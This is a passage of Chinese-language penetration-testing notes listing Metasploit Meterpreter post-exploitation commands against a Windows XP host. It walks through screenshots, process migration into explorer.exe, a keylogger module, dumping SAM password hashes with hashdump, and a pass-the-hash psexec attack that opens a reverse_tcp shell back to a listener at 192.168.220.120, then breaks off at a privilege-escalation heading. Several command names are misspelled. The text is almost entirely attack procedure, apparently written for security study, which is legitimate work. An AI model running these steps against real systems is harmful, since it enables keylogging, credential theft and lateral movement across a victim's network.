常见命令:
在任意位置使用
help
可以获得Meterpreter
命令的帮助
1. 截屏:
meterpreter > screenshot
2. sysinfo
这个命令可以获取系统运行的平台
meterpreter > sysinfo
Computer :
OS :Windows XP(Build 2600,Service Pack 2)
Architecture : x86
Systen LAnguange: en_US
3. 获取键盘记录:
- 利用
ps
获取目标系统正在运行的进程
meterpreter > ps
- 使用
migrate
命令,将会话迁移到explore.exe
进程中,之后启动keylog_recorder
模块
meterpreter > migrate 1834
meterpreter > run post/windows/capture/keylog_recoder
- 一段时间之后使用
ctrl c
终止,最后,在另一个终端里,可以看大我们使用的键盘记录
4. 挖掘用户名和密码
提取本地文件中用户名和密码的哈希值
使用Meterpreter命令获取密码hash值
use priv
命令,意味着运行在特权账号上
meterpreter > use priv
获取安全账号管理器(SAM)数据库,我们需要运行在SYSTEM权限下,以绕过注册表的限制,获取受保护的存有Windows用户和密码的SAM存储
- 使用
hashdump
命令获取系统所有用户名和密码的hash
值
meterpreter > run post/windows/gather/hashdump
5. 传递hash值:
仅利用密码
hash
值登陆系统
msf> use windows/smb/psexec
msf> set PAYLAOD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.220.120
msf> set LPORT 443
msf> set RHOST 192.168.220.13
msf> set SMBPass
密码hash值
msf> exploit
多数情况下,这台主机的管理员账号在域中其他大部分系统一样,这样我们无需破解系统密码,就能够实现从一个结点到另一个节点的攻击
6.4 权限提升
添加用户,并为其提升权限